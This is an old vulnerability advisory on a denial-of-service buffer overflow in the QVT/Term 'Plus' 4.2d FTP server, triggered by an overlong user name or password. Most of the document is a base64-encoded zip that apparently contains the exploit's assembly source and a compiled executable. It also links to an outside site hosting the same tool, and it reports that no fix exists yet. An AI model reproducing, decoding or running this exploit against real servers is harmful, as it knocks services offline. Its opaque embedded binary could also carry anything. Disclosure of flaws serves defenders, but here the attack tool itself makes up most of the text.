COMMAND

    QVT/Term 'Plus'

SYSTEMS AFFECTED

    QVT/Term 'Plus' 4.2d FTP Server

PROBLEM

    UssrLabs found a Local/Remote  DoS Attack in QVT/Term  'Plus' 4.2d
    FTP Server, the buffer  overflow is caused by  a long user name  /
    password,  2000  characters,  and  the  re-connection  to  the Ftp
    Server.  There is  not much to expand  on.... just a simple  hole.
    For example, go to:

        http://www.ussrback.com/qvtfs42/

    for the source /  binary of this remote  / local D.O.S.   Below is
    mimed version of it:

    ---
    Content-Type: application/octet-stream; name="qvtftp42.zip"
    Content-Transfer-Encoding: base64
    Content-Disposition: inline; filename="qvtftp42.zip"
    Content-MD5: k7MPCRkJLV5wOgvtVDfOcg==
    
    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
    
    -----

SOLUTION

    Nothing yet.